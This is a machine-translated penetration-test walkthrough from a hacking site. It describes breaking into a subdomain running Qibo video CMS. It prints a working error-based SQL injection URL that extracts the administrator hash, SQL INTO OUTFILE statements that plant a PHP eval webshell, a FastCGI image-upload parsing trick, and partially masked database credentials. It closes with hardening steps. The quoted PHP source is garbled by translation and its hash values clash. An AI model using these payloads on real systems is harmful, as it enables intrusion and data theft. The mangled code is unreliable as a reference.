Hacking Book | Free Online Hacking Learning


share your technology and add some temperature for safety

Posted by verstraete at 2020-02-27


This penetration is from an actual project, which needs to find the vulnerability. Because the detected object is a large company, it is relatively difficult to find the vulnerability of the main site, while the vulnerability of its subordinate enterprises or subdomain sites is more likely. Through the port scanning of the server, it is found that there are few open ports of the server, automatic scanning of the website system, and no exploitable loopholes. Through the experience combined with the loopholes existing in the system, the server permissions are finally obtained.

1.1 information collection

1. Scan port

Use zenmap to scan the full port of 124. * * *. * * *. The scanning results show that the host is shut down, judge that the server should have security protection, and use the "intense scan no Ping" scanning mode, as shown in Figure 1. The server opens port 808049154, and judge from the scanning information that the server uses Windows 2008

2. Reverse query domain name

In http://www.yougetsignal.com/tools/web-sites-on-web-server/, perform domain name reverse query on the IP address, as shown in Figure 2, and obtain 6 domain names under the IP address.

1.2 scan website

As shown in Figure 3, although XSS vulnerability and JS vulnerability are found, there is no high-risk vulnerability that can be directly exploited. Some information, such as website directory and existing script files, can be found by scanning the results. The target can be scanned, and multiple scanners can be used for cross scanning.

1.3 search for vulnerabilities in CMS system

There is no high-risk or exploitable vulnerability found through the scanner, so only based on experience and manual to find the vulnerability. As shown in Figure 4, "powered by qibosoft v1.0 code © 2003-10 qibosoft" is found at the bottom of the target website. It can be confirmed that Qibo's CMS is adopted. Combined with the website content, it is judged as Qibo video CMS system. A set of Qibo video CMS system is downloaded from the Internet for local analysis.

SQL injection exists in cms1.0 version of Qibo video. The precondition is to register a user, then add a topic, and then execute SQL query to obtain the administrator password.

1. Background address



2. There is a cross site vulnerability

3. SQL injection vulnerability exists

The {$TB {pre} in the code file video / Member / special.php is not initialized. Because of the pseudo global variable registration in Qibo, SQL injection is caused. The code is as follows:

$list * 1000000 + $aid; $array [$list] = $aid; }> 100) {showerr ("record has reached the upper limit!", 1);} if (! In_array ($aid, $Act = = "del" & & $a ID) {$detail = expand (",", $RSDB [TIDs]); Foreach ($detail as $key = > $value) {if ($value = = $aid) {unset ($detail [$key]);} $RSDB [TIDs] = $string = implode (",", $detail); $DB - > query ("update {$_pre} special set TIDs = '$string' where uid = '$lfjuid' and id = '$ID'");} / / $type = = = 'all' initializes to list posts in the topic, {$query = $DB - > query ("select * from {$TB _pre} threads where TID in ($string)"); while($rs = $db->fetch_array($query)){$rs[subject]="<a href='$webdb[passport_url]/read.php?tid=$rs[tid]' target=_blank>$rs[subject]</a>";$_listdb[$rs[tid]]=$rs;}}$aidsdb=explode(",",$rsdb[tids]);$NUM=0;foreach($aidsdb AS $key=>$value){$NUM++; if($_listdb[$value]){$show.="<tr align='center' class='trA' onmouseover=\"this.className='trB'\" onmouseout=\"this.className='trA'\"> <td width='5%'>{$_listdb[$value][tid]}</td> <td width='74%' align='left'>{$_listdb[$value][subject]}</td><td width='10%'><input type='text' name='listdb[{$value}]' size='5' Value = '{$num} 0' > < td > < TD width ='11% '< a href ='special. PHP? Job = show bbsiframe & id = $ID & type = list < ATC & Act = del & aid = {$[listdb [$value] [TID]}' target ='spiframe '> remove < / a > < td > < tr > "; }}$show = "< table width ='100% 'border ='0' cellpacking ='1 'cellpadding ='3' > tr align ='center 'bgcolor =' (eeeeee) '< TD width ='5%' > ID < / td > < TD width ='74% ') Title < / td > < TD width ='10%') sort value < / td > < TD width ='11% '; remove < / td > $show < / TR > < Table >"; $show=str_replace("\r","",$show);$show=str_replace("\n","",$show);$show=str_replace('"','\"',$show);echo "<SCRIPT LANGUAGE='JavaScript'><!--parent.document.getElementById('sp_atclist').innerHTML=\"$show\";//--></SCRIPT>";}if($type=='myatc'||$type=='all'){$detail=explode(",",$rsdb[tids]);$show='';if($page<1){$page=1; }$rows=15; = $DB - > query ("select * from {$TB} threads where $SQL order by TID desc limit $min, $rows");

[Applescript] plain text view copy code

1.4 breakthrough

1. Get registered member information

Visit http: / / www. *****. COM / Member / homepage. PHP? Uid = 2 and http: / / www. *****. COM / Member / homepage. PHP? Uid = 1 respectively to obtain the current system registration account admin and aaaaaa. As shown in Figure 5.

2. Guess the password of member account

To guess the password of aaaaaa, its password is aaaaaa, use this password to log in, and find a topic in the background, and add a topic. Get the topic address:


3. Get incomplete administrator password

Construct SQL injection address to obtain administrator password, and the execution effect is shown in Figure 6:

http://www.********.com/member/special.php?job=show_BBSiframe&type=myatc&id=12&TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,((select concat(username,0x5c,password) from qb_members limit 0,1))),0) %23

4. Use the right function to get the remaining password fields

Although the password "0e8c338ca961a1da946cc6a28" of admin is obtained for the first time, the number of digits is wrong. The number of digits to obtain the password is 25, and the real password is MD5 encryption, which is 32 bits. The remaining password strings are obtained through right (password, 15). As shown in Figure 7, the remaining character strings are obtained successfully.



First access to administrator password: 0e8c338ca961a1da946cc6a28

Second access to administrator password: 46cc6a2802fc1ee

Find the duplicate field combination to obtain its complete password: 0e8c338ca961a1da946cc6a2802fc1ee

5. Get administrator password

Through cmd5.com, crack 0e8c338ca961adad946cc6a2802fc1ee to obtain the password "xdjzh" of administrator admin, use the password to log in at the background, and view the server information. Open the address http: / / www. ******. COM / admin / index. PHP? Lfj = center & job = phpinfo in the browser, as shown in figure 8, and successfully obtain the real path address of the website: D: / phpweb / video

1.5 get webshell

1. Execute SQL query to export one sentence backdoor

Click system functions database tools run SQL statement code to execute the following code in the query statement:

select '<?php @eval($_POST[t]);?>' INTO OUTFILE 'D:/phpweb/video/stttt.php'

After execution, visit the website, and the website prompts that the file does not exist. Follow up with a better address:

select '<?php @eval($_POST[t]);?>' INTO OUTFILE 'D:/phpweb/video/upload_files/s.php'

select '<?php @eval($_POST[t]);?>' INTO OUTFILE 'D:/phpweb/upload_files/icons/s.php'

After execution, the statement is executed successfully, as shown in Figure 9, but the access to the corresponding address is displayed incorrectly, and webshell cannot be obtained. It is speculated that there may be anti-virus software or no write permission.

2. View service information

By checking the information of the server, it is found that fastcgi is enabled on the server and the operating system is IIS7. There may be a parsing vulnerability. Upload a sentence back door picture file through the admin profile decisively, and then visit the address:


The web page displays normally, and the web shell is successfully obtained through the one sentence back door of Chinese kitchen knife, as shown in Figure 10.

Little knowledge:

1. Fastcgi parsing vulnerability: webserver fastcgi is improperly configured, which will cause other files (such as CSS, JS, JPG and other static files) to be executed as PHP script parsing. When the user changes the malicious script webshell to a static file and uploads it to webserver and passes it to the back-end PHP for parsing, the attacker will get the operation permission of the server.

2. Test for vulnerabilities

Create a JPG file test.jpg of phpinfo() in the root directory of the server, and visit http://www.xxx.com/test.jpg/1.php (the name of PHP after test.jpg is casually written). If there is a vulnerability, you can see the information of phpinfo(), otherwise you will return 404 error.

1.6 access to system authority

1. Get port 3389 information

(1) get the process number of termservice:

tasklist /svc | findstr TermService

Result: svchost.exe 2212 termservice

(2) Obtain the port corresponding to PID 2212

   netstat -ano | findstr 2212

The result is 13389.

2. Get database password

Check the database configuration file D: / phpweb / video / data / mysql_config.php through webshell to obtain the MySQL password of 123456 and the database password information of the intranet server

                $dbHost        =        "";

                $dbUser        =        "dataUser111";

                $dbPsw        =        "ZLBVA9C********";

                $dbName        =        "*****";

3. The current authority is system authority

Open the command terminal through webshell, as shown in Figure 12, you can directly add the administrator account as the system permission.

As it is an actual project, no further test has been done after the server permission is obtained. According to the idea, it can continue to penetrate one by one.

1.7 safety reinforcement measures

1. Delete test account aaaaaa

2. Change administrator password

3. Prohibit website member registration

4. Strictly set the website directory permission

5. Set fastcgi

Configure webserver to turn off cgi.fix'pathinfo to 0 or configure webserver to filter special PHP file paths, for example:

if ( $fastcgi_script_name ~ ..*/.*php )


Return 403;